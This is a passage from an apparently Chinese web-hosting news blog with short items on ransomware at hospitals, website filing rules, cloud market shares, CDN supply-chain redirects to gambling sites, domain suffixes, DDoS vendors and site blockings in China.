据腾讯电脑管家官微消息,国内两家省级医院服务器疑似遭最新勒索病毒攻击,致其系统瘫痪,同时数据库文件被加密破坏,已影响正常就医秩序。 值得一提的是,该不法黑客竟然要求医院方面要在指定时间内支付比特币才可恢复数据。不得不让人感慨,这比特币也太火了,黑客想要的竟然不是现金,而是比特币。 主机吧提醒,为防止遭到勒索病毒攻击,请及时安装操作系统漏洞补丁,安全备份重要数据及文件,同时开启文档守护者以免遭勒索病毒破坏。如果网站被攻击建议用百度云加速防护。 #### 国内云主机商开始取消个人用户网站备案码 有玩过备案的朋友一定会知道,像阿里腾讯这些云服务商备案都是用备案码来备的,就是你购买他们主机,他们会给你生成相应的备案码,然后有了这个备案码才可以进行备案。 像主机吧代理的景安就是这样操作的,购买一个主机可以生成10个备案码,西部数码也差不多。不过最近有网友发现个人实名认证的用户是不能生成备案码了。 为什么会这样呢? 原因出现部分用户倒卖备案码的情况,也就是把备案码拿去卖给别人,导致出现很多服务商的备案域名,但是其根本没在服务商购买过空间。 此次调整估计会对一些想通过倒卖备案域名的人有很大影响,不过正规个人备案的倒不会有多大影响。 我们再来看看目前国内个人网站环境,说真的,真的不很好,因为个人网站监管实在太严了,稍有问题就面临整改,甚至直接面临被关风险。 而且百度已经越来越往站内搜索方面发展了,满屏都是自家链接,第三方网站已经极少出现在百度的首页了,能够在当前环境活下来的个人网站真的是行业翘楚了,希望大家一起加油!     #### 国内云服务是否重新洗排?中国拟对外企开放云市场 华尔街日报消息:据知情人士介绍,在周一的会议上,李克强总理回应了IBM首席执行官Ginni Rometty就云计算提出的问题,他表示北京正考虑在自由贸易区开展一个“自由化试点项目”,向外国公司开放云计算领域。总理表示,外国云服务提供商需要克服的一个重大障碍是为中国客户提供充分的“隐私保护”。 按照这项云计算提案,中国允许外国提供商在这个自由贸易区自建数据中心。知情人士表示,自由贸易区最有可能设在南方城市贵阳,贵阳是大数据中心。 不过,正如《华尔街日报》指出的那样,如何处理从中国流出去的数据方面仍存在着问题。 几个关键问题仍然横亘在面前:中国是否允许数据从自由贸易区的数据中心自由流动到中国的其余地区?在自由贸易区开展数据业务的外国公司可以提供哪种类型的数据服务?它们可以为哪些客户提供这种服务? 通过提供试点计划,表明中国有意在这个问题上采取行动。然而,拟议的改变可能“太零敲碎打”。 #### 国内互联网公共资源库沦为菠菜暗链工具 最近,很多站长反馈,网站使用手机访问的时候,偶尔会自动跳转至菠菜网页等。 这个问题非常严重,这属于一种流量劫持,在你不知道的情况下偷偷劫持了你网站的用户,跳转至非法网站,可能被搜索引擎降权删除网页,甚至严重的警察叔叔上门。 为此,主机帮特地查了下相关论坛,发现问题都指向了公共资源库投毒,如 Staticfile 、BootCDN 、Polyfill 。 什么是网页公共资源库呢?其实就是一个互联网仓库,而这个仓库收录了一些国内外非常常用的JavaScript、Css、图片和swt等静态文件,然后提供CDN加速地址给大家免费调用。 调用公共资源库的好处是不需要把笨重的JavaScript资源放到本地服务器上,同时省带宽,公共资源库已经为这些资源提供CDN加速了。 坏处就是,这些链接你并没有控制权,对方加了什么你也不知道。像这次跳转事件,就是有人往这些资源库的代码里加了自动跳转菠菜网站的代码,这些代码很隐秘,如果不是偶然,你几乎不知道。 为什么主机帮说国内互联网公共资源库沦为菠菜暗链工具呢? 其实是有原因的,因为这些公共资源库项目,长期以来都是以公益为目的运营的,但CDN是有成本的,而且随着使用的人越来越多,CDN支出成本只会越来越高,所以原来的运营方绝大多数都是易手了。 而谁会接一个看不到盈利的项目呢?答案是:菠菜公司 这些公共资源库这么多年已经深深植入很多网站上了,菠菜公司只需要在代码上加点暗链,就会得到不错的收益。 这里你看懂了吗? 如果你的网站还在使用公共资源库,尽快本地化吧,以免被植入暗链还不知道。 #### 国内代码托管网站码云Gitee.com被阿里云停止域名解析 10月21日消息 国内基于 Git 的代码托管和研发协作平台码云Gitee今天发布声明,阿里云突然停止了对码云 Gitee.com 的域名解析。 下面是码云声明内容: 今天中午我们收到阿里云的提醒信息,如下: 没有任何提示,没有任何提前通知,阿里云停止了 Gitee.com 的域名解析!!! 我们正在跟阿里云联系了解具体情况! 如果你访问不了请暂时在 hosts 里映射 gitee.com 域名到 IP地址 212.64.62.174 对此造成你的不便,我们深表歉意。 中国的互联网不能这么胡来!!! 据介绍,码云(gitee.com)是 OSCHINA.NET 推出的代码托管平台,支持 Git 和 SVN,提供免费的私有仓库托管。目前已有超过 350 万的开发者选择码云。 随后就有网友开始在网上炸锅了:以前总觉得,GitHub是西方的,代码放别人那里,随时会被卡脖子,用我们自己人的代码托管库,就不怂了!现在看来,自己的代码托管库”照样还是没有决定权、说封你就封你,不能是因为码云这个名称蹭了马云的热度你们阿里云就搞这个吧,中国的互联网不能这样玩! 最后码云方面出面解释称:这次被阿里云突然停止解析和和域名名字无关,之所以被停止解析是因为有赌博app反编译出来带有码云信息。是工信部下达的指令,所以网站被停止解析,目前已经恢复解析,可以正常使用。 通过这件事我们了解到,国内互联网管理越来严,很多网站一但出现违法信息都可能会直接停止,一刀切,造成损失严重,我们没办法对上面要求只能对自己网站严格要求啦! #### 国内免备案服务器商被查 相信有不少站长用过国内免备案主机,以前北京有一家机房就提供免备案接入,后来直接被封机房了。 最近福建部分网站被查出网站未备案入网,当地主机运营商被网监调查批评,开始严查清扫网站备案! 了解到,福建这次部分主机商被严查,主要是因为被当地网监查出当地运营商存在未备案接入网站情况,扫出12个未备案入网的网站,网监宣布严查当地主机服务商,对于放任未备案接入网站的运营商“零容忍”,见一个,罚一个。几乎等于死磕网站备案! 另外还要求当地主机服务商,禁止为未备案网站提供互联网接入服务,网站加速服务也不行,已注销的备案网站该关门就关门,另外要每月都扫一遍自家接管网站,报备未备案网站,相当于以后每个月网站都要来一波核查,想想都头大! 也有站长表示。关于死磕备案不止福建这一家,目前国内几乎都是这样,再想跟之前一样网站裸奔是没戏了,对于个人站长们来讲以后网站备案会越来越严,也会越来越规范化,网站不备案几乎都得关门! 而海外主机对国内访问来说是相当慢的,有条件的站长还是备案吧。 #### 国内公有云市场份额:阿里云依然第一;AWS、百度云、腾讯云、华为云等稳步增长 DC 最新发布的《中国公有云服务市场(2018下半年)跟踪》报告显示, 2018下半年中国公有云服务整体市场规模(IaaS/PaaS/SaaS)超40亿美金,其中IaaS市场增速再创新高,同比增长88.4%,PaaS市场增速更是高达124.3%。 报告显示: IaaS和PaaS整体市场份额:阿里云、腾讯云、中国电信、AWS,百度云位列前五; IaaS市场份额:阿里云、腾讯云、中国电信、AWS、金山云占据前五。 2018年,公有云市场后发厂商频频发力,华为、百度、浪潮、京东等均得力于其强大的研发和生态实力,实现了高达市场平均水平2-8倍的迅猛增长。 2018年,中国公有云市场发展热情空前高涨,一方是阿里、腾讯、中国电信、金山等先进入者的大步践行,另一方是华为、百度、浪潮、京东等后发力者的高歌猛进,一时亮点纷呈,看点迭出: 云产品迭代创新快:2018年公有云产品发布主要围绕高性能计算、异构计算、容器和无服务器、机器学习和机器人应用、IoT平台、自研云原生数据库、混合云七大关键词展开。 云与智能的强融合:智能云、云智能已然成为主要公有云服务商的未来战略,不仅体现在组织结构调整上,还体现在产品和服务研发上。基于云上的一体化的、使用便捷的AI服务能力成为公有云服务商比拼的重要方向。 混合云成发展常态:企业用户的多样化需求、公有云服务商的多元化发展,使得混合云部署、管理和运维等逐渐发展为一个初具规模的专业化市场,并对越来越多传统的信息技术服务商、增值开发商等体现出强烈的吸引力。 行业探索逐渐落地:虽然中国互联网行业的云计算应用已经相对成熟,但广大的非互联网行业对公有云的探索才开始不久。阿里、腾讯、华为、百度、浪潮等纷纷结合自身优势,明确了重点行业纵深发展战略,并借力合作生态布局不断拓展细分行业市场。   2018年11月26日IDC发布《《中国公有云服务市场(2018上半年)跟踪》报告显示,而前五大IaaS厂商同样是阿里云、腾讯云、中国电信、由光环新网和西云数据运营的AWS、金山云。 2018年上半年与下半年 IaaS 市场份额对比:阿里云市场份额由43%下降到42.9%,腾讯云由11%增加到11.8%,中国电信由8%增加到8.7%,AWS由6%增加到6.4%,金山云由5%下降到4.8%。 IDC未公布2017年下半年的报告数据,仅公布了2017年上半年的数据,前五大 IaaS 供应商:阿里云、腾讯云、中国电信、金山云、UCloud。 2017年上半年与2018年下半年IaaS市场份额对比:阿里云由47.6%下降到42.9%,腾讯云9.6%增加到11.8%,金山云由6.5%下降到4.8%,中国电信由6.0%增加到8.7%;UCloud消失在前五。Others 份额在扩大,由24.8%增加到25.4%。 综合来看,近两年的黑马AWS,百度云、腾讯云在稳步增速;阿里云份额在下滑,正如IDC报告中称IaaS厂商集中度略有下降;但是金山云、UCloud面临严峻的市场压力。 #### 国内出了一个开源软件镜像平台:AtomHub 如果你是一位运维,有没有因为安装国外的开源软件而捉急,比如主机吧安装OpenLiteSpeed,就曾经崩溃,原因OpenLiteSpeed的镜像服务器地址是国外的,国内服务器经常因为连接不稳定,安装不上。 不过,这个问题可能要被解决了,原因是国内新推出了一个开源软件镜像平台:AtomHub AtomHub 开源容器镜像中心公测介绍 AtomHub 开源容器镜像中心是由开放原子开源基金会主导,华为、浪潮、DaoCloud、谐云、青云、飓风引擎以及OpenSDV开源联盟、openEuler社区、OpenCloudOS社区等成员单位共同发起建设的项目。该项目正式开放公测,旨在为开源组织和开发者提供一个中立、开放共建的可信开源容器镜像中心。 特性和服务 AtomHub 的建立是为了解决开发者在使用如 Docker Hub 等海外镜像仓库时遇到的网络不稳定、镜像拉取被限流以及缺失中立平台等问题。AtomHub 提供的服务包括: 安全性:提供一套完善的安全机制,包括镜像签名、漏洞扫描和内容合规检测,以确保镜像的安全可靠性。 镜像评级机制:确保镜像质量和安全性,官方镜像由AtomHub官方发布,保证高度的可靠性和安全性。 基于国产操作系统和软件:打造自主可信根镜像、可信全链路构建系统,支持安全漏洞扫描和内容合规检测,及时发现和修复镜像漏洞和安全风险。 高性能镜像存储后端:采用高性能镜像存储后端、多云CDN同步、冷热数据自动转储分流等关键技术,打造百万级并发规模容器镜像分发平台。 开源项目信息 AtomHub 作为一个新兴的开源容器镜像中心项目,对中国本土云原生技术和开源生态良性循环有巨大促进作用。它基于国产操作系统和软件,旨在重建可持续容器镜像供应链,为用户提供更稳定、高效的容器镜像服务。 总的来说,AtomHub 开源容器镜像中心的公测是中国开源社区的一个重要里程碑,它不仅提供了一个稳定可靠的容器镜像服务平台,还促进了国内云原生技术和开源生态的发展。 #### 国内各大CDN厂商 cname别名解析域名后缀查询 很多网站使用CDN,大家不知道是哪家公司提供的CDN,今天我们来盘点下国内各大CDN厂商使用的cname别名后缀,通过这个别名,我们可以知道是哪家CDN服务商的。 CDN厂商/cname后缀 阿里云 *.kunluncan.com*.cdngslb.com *.kunlungr.com *.alikunlun.com 腾讯云*.cdntip.com*.spcdntip.com*.dnsv1.com *.dnse2.com 网宿 *.wsdvs.com*.wsglb0.com*.wscdns.com 百度云 *.jomodns.com *.baiduads.com 金山云*.ksyuncdn.com*.ks-cdn1.com 华为云*.cdnhwc2.com 白山云*.qingcdn.com*.trpcdn.net*.bsclink.cn 七牛云*.qiniudns.com 又拍云*.aicdn.com 蓝汛 *.ccgslb.com.cn 帝联 *.dwion.com*.astcdn.com 以上是一些不完全统计,可能有更多。 #### 国内哪些域名使用得多 哪些域名容易被收录 哪些域名容易被收录?理论上,所有的域名都会被搜索引擎收录,且规则一样。不过,我们在实际使用过程中,仍旧会感到有差异性,这主要是因为每个域名出现时间、使用人数等有差别。 例如在我国,根据CAICT全国互联网信息安全管理系统监测,截至2019年6月,我国活跃域名约为3774.7万个(简称全国总量),其中“.COM”、“.CN”和“.NET”域名数量排名前三位,合计占全国总量的79.1%。这就给很多人造成了,com、cn、net三个域名比较容易被收录。 虽然最主要原因是由于使用人数问题,而产生了如此错觉。不过正是由于使用人数众多,相对的,我们使用这三个域名后缀,搜索引擎接纳起来,相对容易些,千万别用那些非主流域名,比如.blog域名,这种域名不易被搜索引擎收录,甚至连360、搜狗都不会收录这种后缀域名,虽然看着好看,但没有搜索引擎流量来源,无形中流量降了一大半,得不偿失。 我国域名使用量TOP20的顶级域份额: .com域名,占据66.6%;.cn域名,占据8.8%;.net域名,占据3.7%;.org域名,占据2.9%;.ru域名,占据2.4%;.de域名,占据1.4%;.info域名,占据1.0%。 以及.top域名、.cc、.nl、.pl、.it、.co、.biz、.xyz、.xin、.club、.vip、.wang、.mobi等域名后缀 我国域名注册量排名靠前的则是: .cn、.com、.top、.中国、.net、.xyz、.loan、.club、.biz、.ltd、.vip、.online、.site、.xin、.org、.wang、.网址、.shop、.fun、.win等域名后缀 我们根据这些排名来简单判断、预测哪些域名容易被收录,哪些域名未来增长会比较快。 #### 国内哪些顶级域名后缀可以备案 2018年后,所有顶级域名需要国内批复的才可以备案,所以很多顶级域名后缀国内是不能备案的,比如.ai、.io等。 那么国内哪些顶级域名支持备案呢?以下我们来盘点下: 英文顶级域名 .REN .WANG .CITIC .TOP .SOHU .XIN .COM .NET .CLUB .XYZ .VIP .SITE .SHOP .INK .INFO .MOBI .RED .PRO .KIM .LTD .GROUP .BIZ .LINK .WORK .LAW .BEER .STORE .TECH .FUN .ONLINE .ART .DESIGN .WIKI .LOVE .CENTER .VIDEO .SOCIAL .TEAM .SHOW .COOL .ZONE .WORLD .TODAY .CITY .CHAT .COMPANY .LIVE .FUND .GOLD .PLUS .GURU .RUN .PUB .EMAIL .LIFE .CO .FASHION .FIT .LUXE .YOGA .BAIDU .CLOUD .HOST .SPACE .PRESS .WEBSITE .ARCHI .ASIA .BIO .BLACK .BLUE .GREEN .LOTTO .ORGANIC .PET .PINK .POKER .PROMO .SKI .VOTE .VOTO .ICU .FANS .UNICOM .JPMORGAN .CHASE .CC .BAND .CAB .CAFE .CASH .FAN .FYI .GAMES .MARKET .MBA .NEWS .MEDIA .SALE .SHOPPING .STUDIO .TAX .TECHNOLOGY .VIN .BABY .COLLEGE .MONSTER .PROTECTION .RENT .SECURITY .STORAGE .THEATRE .BOND .CYOU .UNO .SCHOOL .GLOBAL .ME .PW .HK .TV .SAXO .CLICK .AUTO .AUTOS .BEAUTY .BOATS .CAR .CARS .HAIR .HOMES .MAKEUP .MOTORCYCLES .QUEST .SKIN .TICKETS .YACHTS 中文顶级域名 .公司 .网络 .网址 .商城 .网店 .中信 .商标 .广东 .佛山 .信息 .手机 .在线 .中文网 .集团 .我爱你 .商店 .企业 .娱乐 .游戏 .购物 .餐厅 .招聘 .时尚 .移动 .网站 .联通 .世界 .健康 .香港 更详细的可以看工信部网站https://domain.miit.gov.cn/ #### 国内哪家CDN服务商有俄罗斯节点? 最近有同学问我,国内哪家云服务商提供俄罗斯节点,目前来看,国内各大云服务商都没有俄罗斯的节点,原因可能是俄罗斯并没有开放其它国家运营电信网络,不过如果你想要俄罗斯访问快的话,可以看看隔壁白俄罗斯的,华为云的海外CDN有白俄罗斯的节点。 大区节点分布(以华为内部业务划分区域)亚洲中国香港、中国澳门、中国台湾、日本、韩国、越南、印度、印尼、泰国、菲律宾、新加坡、马来西亚、柬埔寨、老挝、吉尔吉斯斯坦、文莱、缅甸、尼泊尔、孟加拉、蒙古、斯里兰卡、哈萨克斯坦、格鲁吉亚、亚美尼亚、乌兹别克斯坦、塞浦路斯、阿塞拜疆欧洲英国、德国、法国、荷兰、西班牙、意大利、 爱尔兰、瑞典、比利时、奥地利、波兰、罗马尼亚、白俄罗斯、葡萄牙、土耳其、摩尔多瓦、保加利亚、拉脱维亚、瑞士、捷克、匈牙利、卢森堡、希腊、克罗地亚、塞尔维亚、芬兰中东&非洲阿联酋、沙特、巴基斯坦、卡塔尔、阿曼、科威特、巴林、伊拉克、南非、埃及、肯尼亚、坦桑尼亚、马达加斯加、吉布提、毛里求斯、加纳、安哥拉、尼日利亚、约旦、也门、以色列、塞内加尔北美洲美国、加拿大、墨西哥大洋洲澳大利亚、新西兰、斐济南美洲巴西、智利、阿根廷、秘鲁、哥伦比亚、厄瓜多尔 #### 国内外免费域名DNS解析服务大全 CloudXNS宣布“暂停免费用户域名DNS解析”后,我觉得很有必要整理一下国内外那些免费的DNS域名解析服务。CloudXNS“粗暴”地要求用户转移出去真心是我用了这么年的DNS的头一回,无论原因是什么,给用户造成这样的“麻烦”CloudXNS至少要承担一定的责任。 不过,少了一个CloudXNS也没有关系,毕竟DNS域名解析服务并不只有一家,免费的DNS域名解析服务在国外也非常地常见,除了没有地理位置和线路识别功能,国外的DNS域名解析服务其实也可以用于网站域名解析,基本上可以满足大部分的网站DNS解析需求。 一般域名使用注册商提供的域名解析服务虽然方便,但功能大多有限,特别是目前国内还会针对某些DNS服务器进行屏蔽,造成网站无法解析的情况出现,因此,使用第三方域名解析服务也是中国网站的必要选择,这里就介绍一些常见的免费域名解析服务。 国内外免费DNS域名解析服务汇总列表 CDN服务自带域名解析 CloudFlare:虽然它的主营业务是CDN(Anycast),但丝毫不影响它作为免费DNS的声誉,况且这个免费DNS是真的全球分布(12个节点),且使用了CDN技术。 百度云加速:云加速也主要是CDN业务,顺带提供DNS域名解析,提供抗CC攻击、免费DNS解析、免费分省解析、防黑客攻击、黑链暗链防护、页面篡改防护服务。   #### 国内将全面打击虚拟货币 币圈应声大跌 昨晚夜间,虚拟货币再次集体崩盘,其中比特币一度跌超16%,莱特币一度跌超30%,以太币一度跌超20%。连日来,虚拟货币的大幅波动仍在继续。值得注意的是,大幅波动再次造成大量的资金损失。据比特币最新数据显示,最近24小时,共有242175人爆仓,96.46亿元资金灰飞烟灭。 周末加密货币市场的暴跌引起了多头和市场参与者的注意,其中包括亿万富翁马克·库班(Mark Cuban),他似乎在一定程度上将这种暴跌归咎于过度杠杆和对比特币替代品的投机。另外值得注意的是,衡量加密货币市场焦虑程度的一个流行指标是恐惧和贪婪指数,该指数为14,这表明市场处于极度恐惧,而上月该指数触及了贪婪水平的55。 为了防范风险,近日,中国提出打击比特币挖矿和交易行为。5月18日,全国进一步贯彻落实央行等部门发布的《关于防范比特币风险的通知》《关于防范代币发行融资风险的公告》等要求,防范虚拟货币交易炒作风险。5月21日,国务院金融稳定发展委员会进一步要求,“打击比特币挖矿和交易行为”。   5月23日,火币商城便向用户们发出如下公告: #### 国内开始强制运营网站进行公安备案了 今天收到百度智能云CDN的短信提醒,具体如下: 大概意思是,网站开通后30天内必须做公安备案,虽然短信上没有说明不做公安备案的后果,不过按主机吧以往的经验来看,如果不做公安备案的话,很大可能会接到当地公安的电话要求强制备案。 其实公安备案早在几年前就开始了, 不过那时很多地方并没强制,一般只要ICP备案通过即可正常运营网站,现在来看,公安备案也开始走强制线路了。 其实公安备案很容易通过,只需要填写网站管理者的地址、电话、名字、身份证,还有域名和服务器商所属公司就可以了,审核一般都会通过,不像ICP备案那么麻烦,但是强制公安备案其实也是提高了网站建设的成本,让本来市场就不好的行业更是雪上加霜了。当然如果你是做正规内容的,不违法的其实这些都不用怕,顶多麻烦些,但是违法网站就没法享受国内互联网便利了。 目前只是服务器商强制要求公案备案,就怕以后国内CDN服务商也要求公案备案才可以用的话,那就麻烦了。 #### 国内开源程序要崛起,工信部加快普及开源文化 12月1日 消息:昨日,工信部召开新闻发布会,介绍“十四五”软件和信息技术服务业发展规划有关情况。 在培育国内开源软件生态方面,工信部表示,目前,我国已成为全球开源生态的重要贡献力量,参与国际开源社区协作的开发者数量排名全球第二;企业“拥抱”开源趋势明显,使用开源技术的软件企业占比近90%;国内开源基金会建设取得实质性进展,“OpenHarmony”等一批可圈可点的本土开源项目正在孵化,开源能力建设步入实践深耕新阶段。华为“鸿蒙”通过开源变“一家所有”为“开放共有”,加速产业生态集聚,目前装机量已突破1.7亿台。 工信部称,下一步,工信部将不断繁荣国内开源生态,重点做好以下几个方面的工作: 一是夯实开源发展基础。发挥开源基金会等专业组织牵头引领作用,完善开源治理机制和治理规则,推广开源理念。加快建设开源代码托管平台等基础设施。 二是打造开源软件品牌。借鉴国际开源项目成功经验,建立完善生态链各方积极参与的开源社区,面向重点领域孵化一批基础性、前瞻性的开源项目。 三是加快普及开源文化。不断完善开源软件生态治理体系,引导企业、高校、开发者了解开源、学习开源、使用开源、回馈开源,扩大开源生态的社会影响力。 四是加强开源治理国际合作。着眼全球,推广我国优秀开源项目,吸引世界开发者广泛参与,助力我国软件产业的全球化布局。 同时,工信部还表示,总体而言,国内开源生态建设尚处起步阶段,面临发展基础较弱、底层技术掌控不足、开源文化氛围不浓、政策支持有待加强等制约因素。 《规划》突出强调开源在驱动软件产业创新发展、赋能数字中国建设的重要作用,提出“繁荣国内开源生态”的重点任务,设置“开源生态培育”专项行动,统筹推进建设高水平基金会,打造优秀开源项目,深化开源技术应用,夯实开源基础设施,普及开源文化,完善开源治理机制和治理规则,加强开源国际合作,推动形成众研众用众创的开源软件生态。 #### 国内必应搜索挂了! 5 月 23 日最新消息,大量网友反馈称,微软必应搜索国内版疑似出现故障,网页打开延迟卡慢,甚至出现错误代码。 主机吧这会打开搜索也显示错误代码。 网友反馈表示,此次问题来源于微软全球部署,而非仅出现在北京微软云域内。 在目前国内的这个搜索环境来看,必应搜索的故障显得非常敏感,因为根据机构刚刚发布的报告4月份必应国内的搜索份额超过了百度! 这个时候故障,有点当年谷歌那味了,当年谷歌跟百度打得难分难解的时候,网络突然不行了,据称是遭遇各种攻击,导致谷歌打开时好时坏,现在必应难道也遭遇攻击? 这里不得不吐嘈下百度,百度市场份额的下降完全是咎由自取!本身AI生成非常垃圾,却强行接入搜索引擎,内容质量极差,甚至为了业绩强行给搜索引擎塞入各种广告,自家产品也不管跟内容匹不匹配,强行提高排名,搜索质量一落千丈,这样的搜索引擎不被抛弃才怪。 #### 国内技术型网站快完蛋了 今天无意中逛了下在百度搜索看到了PHP中文网,想着好久没有看过这个网站了,然后登陆看看,结果发现惊人秘密:PHP中文网 居然搞泛流量内容了! 所谓泛流量就是发布一些与网站主题毫无相关的热点内容,而由于这些网站本身有一定的权重,所以发这些内容往往会得到不错的排名,从而得到不错的流量。 目前国内很多网站都流行这么搞,百度打击过几次,效果不大,原因是百度老权重站太照顾了,这些站基本都是一些老域名,有一定权重的站,他们可以通过大批量导入热门词内容,只要百度收录,基本都会有排名,主机吧查了下PHP中文网站的权重,目前高得吓人。 这些泛流量的词其实并不能给网站带来多大收益,因为这些词跟网站本身主题并不相关,所以基本上很多访客都是访问一个页面就关了,跳出率贼高,对网站相关业务也没多大帮助。 那么为什么这些大站要做这些事呢? 原因是技术型的网站快死了,目前百度的搜索模式对技术型的网站并不友好,网站如果长期不更新,不仅没有流量,以前的词排名也可能受到影响。 同时百度AI生成、百度全家桶等都占据了搜索绝大部分排名,技术型网站很难存活。PHP中文网这种做法就是好死不如赖活的做法,起码这些流量是实实在在的,可以适当做些广告联盟,起码能养活网站,而不是靠爱发电。 总之,目前国内技术型网站情况不大好,IT行业感觉要被AI整死了。 #### 国内最大QQ养号平台“小果平台”被摧毁:涉及2亿个QQ 央视报道,国内最大QQ养号平台小果平台被连根拔起,清理平台QQ号2亿多个,全国 1300 多起网络诈骗案件中使用的 QQ 号全部来自这个平台。 这次中招的QQ养号平台叫小果平台,上线于2016年,只做QQ号生意,凡是没有经过实名认证的QQ号,都能在小果平台批量解绑、换绑、找回密码,2019年半年时间,平台盈利近3000万元,堪称暴利! 在小果平台QQ号可以随意买卖,根据QQ号的等级不同,价格从几元到上万元都有,目前在小果平台上注册的卡商、QQ号商会员共计14万余名,绑定手机号600余万个,QQ号2亿多个。平台主要业务就是帮黑产或者博彩诈骗组织掌握的没有经过实名认证QQ号进行批量管理养号,可以说小果平台目前算是国内最大的QQ养号平台。 针对小果平台被一锅端,有网友表示:半年3000万?这也太赚钱了吧?,平台养了2亿多个qq 这占了国内qq多少比例啊,专业点讲这简直就是一个QQ号的电商中介平台,这他妈早不是灰产,也超过一般的黑产。就是彻头彻尾的犯罪,这一波一下子清理了2亿多个QQ,骗子成本要增加,KPI怕是也要涨了,后面估计QQ号也该涨价了,而且事实上真正的手机卡卡商不一定就比这少,互联网黑产恐怖如斯! #### 国内最新搜索引擎排名:百度80%稳居第一 日前,“网速管家”发布2020年7月最新的国内搜索引擎占有率,其中,百度作为多数中国网民优先选择的搜索引擎,稳居国内搜索引擎排名第一,PC端市场占比81.26%,移动端市场占比80.62%,均碾压其他搜索引擎。 其中,在PC端,排名第二位的是360搜索,市场占比10.97%;排名第三的是搜狗搜索引擎,市场占比4.28%。其他所有搜索引擎总份额仅3.39%。 而在移动端,排名第二的是神马搜索,占比高达8.58%,比第三名搜狗的7.89%还要高,360搜索只位列“其他”,共享2.91%的份额。 据了解,神马搜索是UC和阿里2013年已经成立合资公司推出的移动搜索引擎。它号称是全球第一款完全基于移动互联网的搜索引擎,聚焦在解决手机用户的需求和痛点,比如大家已经能够看到App搜索、小说搜索、周边搜索等等。 神马搜索的背后有阿里云搜索数年的技术积累,又经过了UC浏览器超过5亿用户的测试。 #### 国内有哪些知名的DDOS防御服务商 以下是一些中国知名的DDOS防御平台: 网御星云:网御星云是一家网络安全公司,提供基于云的DDOS防御服务,以及其他网络安全解决方案,如Web应用程序防火墙和安全运营中心。 安恒信息:安恒信息是一家网络安全公司,提供基于云的DDOS防御服务,以及其他网络安全解决方案,如威胁情报和漏洞管理。 天融信:天融信是一家网络安全公司,提供基于硬件和软件的DDOS防御解决方案,以及其他网络安全解决方案,如Web应用程序防火墙和SSL VPN。 云境网络:云境网络是一家网络安全公司,提供基于云的DDOS防御服务,以及其他网络安全解决方案,如Web应用程序防火墙和安全运营中心。 360网盾:360网盾是一家网络安全公司,提供基于云的DDOS防御服务,以及其他网络安全解决方案,如Web应用程序防火墙和威胁情报。 绿盟科技:绿盟科技是一家网络安全公司,提供基于云和硬件的DDOS防御解决方案,以及其他网络安全解决方案,如Web应用程序防火墙和威胁情报。 华为云:华为云是华为公司的云计算服务品牌,提供基于云的DDOS防御服务,以及其他云安全解决方案,如Web应用程序防火墙和安全运营中心。 启明星辰:启明星辰是一家网络安全公司,提供基于硬件和软件的DDOS防御解决方案,以及其他网络安全解决方案,如Web应用程序防火墙和终端安全。 #### 国内的公共DNS开始收费了,阿里云公共 DNS 将对免费解析请求进行限速 阿里云公共DNS是阿里云提供的域名解析服务,旨在为用户提供快速、稳定的域名解析服务。近期,阿里云发布公告,将从2024年10月1日起对公共DNS中的免费解析请求实施限速措施。这一变化引起了广泛关注,特别是对于依赖阿里云公共DNS服务的个人和企业用户来说,了解新的限速政策及其影响至关重要。 限速政策详解 根据阿里云的公告,此次限速主要是为了在高并发解析场景下,保证公共DNS的整体服务稳定性和用户的使用体验。具体而言,阿里云将对来自同一请求源IP的并发请求数量进行限制,这个限制并不是固定的阈值,而是会根据网络负载情况和公共DNS的服务质量动态调整。 对于超出限速阈值的请求,将会受到限速策略的影响。这意味着用户可能会经历解析延迟增加或请求被拒绝的情况。阿里云建议个人用户如果流量较高,可以考虑升级至付费版的公共DNS服务,付费版服务承诺99.99%的解析服务可用性,并且不会受到限速影响。 对用户的影响 对于免费版服务的用户,尤其是那些使用量较大的个人用户,这项新政策可能会对其使用体验产生负面影响。如果用户不愿意或无法承担付费服务的成本,他们可能需要寻找其他的解决方案,比如使用其他提供商的免费DNS服务。 企业用户则更加倾向于使用付费服务,以确保业务的连续性和可靠性。阿里云为此提供了详细的付费版服务等级协议,其中包括服务可用性的承诺和相应的赔偿方案,这在一定程度上增加了用户对付费服务的信心。 结论 总体来看,阿里云公共DNS的限速措施是为了平衡服务质量和用户体验而做出的调整。虽然这可能对某些用户产生短期影响,但从长远来看,这种动态调整有助于维持服务的稳定性和可靠性。对于受影响的用户,尤其是企业用户,建议仔细评估自身的需求,并根据实际情况选择是否升级至付费服务。同时,用户也应当留意市场上是否有其他合适的替代服务,以便做出最佳选择。 参考资料: 《公共 DNS 免费版接入限速通知_公网递归解析_云解析 DNS (DNS)-阿里云帮助中心》 #### 国内知名IT博客:博客园发布整改公告 日前博客园官方博客发布网站整改公告称,「为了遵守相关法律法规,合法合规运营,网站进行全面整改,整改工作于 2021 年 3 月 18 日12: 00 开始,预计于 3 月 25 日11: 59 结束,整改期间全站无法发布任何内容,之前发布的内容重新审核后才能访问,由此给您带来很大的麻烦,请您谅解。」 资料显示,博客园创建于 2004 年 1 月,博客园诞生于江苏扬州。博客园是一个面向开发者的知识分享社区。 自创建以来,博客园一直致力并专注于为开发者打造一个纯净的技术交流社区,推动并帮助开发者通过互联网分享知识,从而让更多开发者从中受益。博客园的使命是帮助开发者用代码改变世界。 博客园于2005 年 12 月获得中国博客服务商前十强,2006 年 4 月获评2006 中国Web2. 0 值得关注的百家企业,2007 年 3 月获评 2007 年中国最具投资价值 100 网站。 博客园可以说是主机吧曾经最喜欢的逛的网站,里面广告非常少,而且干货相当多,可以学到很多技术知识。不过后来由于博客的慢慢没落,现在的博客园已经大不如前了,活跃用户已经很少了,现在更是由于内容问题需要整改,主机吧希望博客园能再创未来,毕竟好的网站已经越来越少了,现在的网友多都是只能逛逛抖音、淘宝,实在是太乏味了。 #### 国内知名中文技术社区论坛linux do域名被墙 最近有玩linux.do的站长发现该网站已经无法正常打开,打开显示连接超时。 主机帮查询后发现该网站已经被国内墙了,国内目前域名解析至一堆乱七八遭的IP上。 而国外却是正常的,这是典型的被墙现象。 “域名被墙” 是指某个域名在中国大陆地区因各种原因被国家防火墙(GFW)屏蔽,导致用户在国内网络环境下无法正常访问该域名所指向的网站,而在国外通常可以正常访问。这种现象通常表现为访问网站时提示 “无法访问”“连接超时”“连接被重置” 等错误信息。 常见被墙原因包括:内容违规:如网站涉及敏感政治、色情、暴力、赌博等违法信息,被监管部门识别后屏蔽。IP封锁:网站所在服务器的 IP 因其他违规网站共用或遭受攻击,被整体封锁。域名历史问题:新注册的域名可能因曾被用于非法用途,即使更换了使用者也可能被墙。DNS污染:域名解析被篡改,导致用户无法正确获取网站 IP 